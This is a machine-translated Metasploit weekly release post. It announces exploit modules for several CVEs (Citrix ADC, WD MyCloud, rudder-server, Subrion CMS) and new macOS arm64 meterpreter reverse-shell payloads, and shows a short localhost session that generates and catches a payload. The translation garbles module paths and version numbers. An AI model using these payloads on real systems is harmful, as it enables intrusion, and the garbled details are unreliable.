最后更新于2023年8月10日星期四21:19:25 GMT
用这个新的云漏洞在天空中飞行!
This week, 添加了一个新模块,可以在某些版本的西部数据MyCloud硬件中利用身份验证绕过和命令注入. 社区成员提交 Erik Wynter, 该模块获得对目标的访问权限, 尝试绕过身份验证, 验证该操作是否成功, 然后以根权限执行负载. 这适用于2之前的版本.30.196,并且在几个命令中提供了很大的灵活性. See the original PR for more info!
OSX Meterpreter支持M1和M2设备
感谢伟大的工作 usiegl00, Metasploit现在对M1和M2 Arm64设备都有有效负载支持,这些设备运行时不需要在目标机器上安装x64 Rosetta模拟器.
新的有效载荷是:
osx / aarch64 meterpreter / reverse_tcp
osx / aarch64 / meterpreter_reverse_http
osx / aarch64 / meterpreter_reverse_tcp
osx / aarch64 / meterpreter_reverse_http
生成有效载荷的示例:
msf6 > use payload/osx / aarch64 / meterpreter_reverse_tcp
msf6 payload(osx / aarch64 / meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*]写入812819字节到/Users/user/Desktop/payload_stageless...
在远程主机上执行负载后,会话将打开并可以与:
msf6 payload(osx / aarch64 / meterpreter_reverse_tcp) >
[*]传送第一阶段...(328 bytes)
[*]传送第二阶段...(65536 bytes)
[*]发送阶段(812819字节)到127.0.0.1
[*]计量器第8次会话打开(127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500
msf6 payload(osx / aarch64 / meterpreter_reverse_tcp) > sessions -i -1
[*]与5开始互动...
meterpreter > getuid
服务器用户名:demo
meterpreter > sysinfo
计算机:演示.local
操作系统:macOS Ventura (macOS 13).2.0)
架构:arm64
BuildTuple: aarch64-apple-darwin
计量器:aarch64/osx
meterpreter >
Metasploit开始上路了
Next week, Metasploit团队的一部分人将在拉斯维加斯参加黑帽大会, 除了拉斯维加斯和DEF CON. 我们自己的Spencer McIntyre将在Black Hat和DEF CON上展示针对活动目录的一些最新Metasploit功能和工作流程. 一定要过来看看. 我们还会发放当地货币的贴纸.
- 8月10日(星期四)下午13:00-14:30在商务大厅举行黑帽会议
- DEF CON将于8月11日(周五)10:00-12:00在委员会会议室举行
新增模块内容(10)
Citrix ADC (NetScaler) Forms SSO Target RCE
作者:道格拉斯·麦基,罗恩·鲍斯,斯宾塞·麦金太尔
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
路径:利用/ freebsd / http / citrix_formssso_target_rce
AttackerKB参考: CVE-2023-3519
描述:这增加了一个针对CVE-2023-3519的漏洞,该漏洞是Citrix ADC中未经认证的RCE. 通过制作一个特制的HTTP GET请求, 类中触发堆栈缓冲区溢出 nsppe
作为根运行的进程.
西部数据MyCloud未经认证的命令注入
作者:埃里克·温特,雷姆科·维默伦,史蒂文·坎贝尔
Type: Exploit
Pull request: #18221 contributed by ErikWynter
路径:利用/ linux / http / wd_mycloud_unauthenticated_cmd_injection
AttackerKB参考: CVE-2018-17153
描述:增加了西部数据MyCloud 2之前的身份验证绕过(CVE-2018-17153)和命令注入(CVE-2016-10108)漏洞的漏洞利用模块.30.196. 该模块首先执行检查以验证目标是否容易受到攻击,方法是尝试利用身份验证绕过,然后注入简单的 echo
command. 如果目标被确认是脆弱的, 该模块利用相同的命令注入漏洞以root权限执行负载.
方向舵服务器SQLI远程代码执行
作者:Ege balcyi
Type: Exploit
Pull request: #18205 contributed by EgeBalci
路径:利用/多/ http / rudder_server_sqli_rce
AttackerKB参考: CVE-2023-30625
描述:这增加了一个利用RudderStack的rudder-server中的SQL注入漏洞(CVE-2023-30625)来实现未经身份验证的远程代码执行的漏洞利用模块. 此漏洞影响的版本为1之前版本的rudder-server.3.0-rc.1.
智能subion CMS 4.2.1 -通过认证的文件上传旁路到RCE
作者:felipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
路径:利用/多/ http / subrion_cms_file_upload_rce
AttackerKB参考: CVE-2018-19422
描述:这增加了一个利用Subrion CMS版本4中经过身份验证的文件上传漏洞的利用模块.2.1 and prior. 由于方式上的问题 .htaccess
默认配置为File, 可以将PHP代码上传到web服务器并实现远程代码执行.
AWS实例连接
作者:sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
路径:有效载荷/单打/ cmd / unix / bind_aws_instance_connect
描述:这将添加AWS实例连接会话.
OSX AArch64有效载荷支持
Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
路径:有效载荷/单打/ osx / aarch64 / meterpreter_reverse_http
描述:增加了对多个OSX AArch64有效负载的新支持: osx / aarch64 meterpreter / reverse_tcp
, osx / aarch64 / meterpreter_reverse_http
, osx / aarch64 / meterpreter_reverse_tcp
, osx / aarch64 / meterpreter_reverse_http
. 这允许在没有安装Rosetta的M1或M2 OSX设备上使用本机有效负载.
增强功能和特性(4)
- #18223 from adfoster-r7 这个PR修复了在shell会话之间切换时msfconsole命令历史管理的问题.
- #18239 from h00die —增加已验证的版本号(1).12.1, 1.12.1-RC2, and 1.20.0) to the
利用/多/ http / apache_nifi_processor_rce
RCE module. - #18249 from adfoster-r7 -在加载Mettle扩展(如扩展API)失败时提供更好的错误消息
extapi
. - #18255 from adfoster-r7 -从Metasploit docker容器中删除Python2支持,因为它已经正式结束生命, Metasploit不再使用. Python3支持仍然可用.
Bugs fixed (6)
- #18203 from adfoster-r7 修复了运行
扫描仪/ ssh / libssh_auth_bypass
模块在新版本的Ruby上. - #18209 from adfoster-r7 修复了
windows /地方/ bypassuac_comhijack
利用模块,该模块由于语法错误而中断. - #18234 from D00Movenok -这修复了64位消息框有效载荷中的一个错误,它将无法执行
user32
还没有加载. - #18238 from dwelch-r7 修复了一个设置时
USERNAME
,USER_FILE
andPASS_FILE
有扫描器模块. 的第一个用户名USER_FILE
不会对任何密码进行测试吗PASS_FILE
,这是固定的. - #18243 from adfoster-r7 -此PR修复了appscan导入会因空证明而失败的问题.
- #18248 from adfoster-r7 修复运行JSON msfrpc服务时的启动警告.
Documentation
您可以在我们的网站上找到最新的Metasploit文档 docs.metasploit.com.
Get it
与往常一样,您可以使用 msfupdate
自上一篇博文以来,你可以从
GitHub:
If you are a git
用户,可以克隆 Metasploit框架 (主分支)为最新.
要安装fresh而不使用git,您可以使用open-source-only 夜间的安装程序 or the
二进制安装程序 (也包括商业版).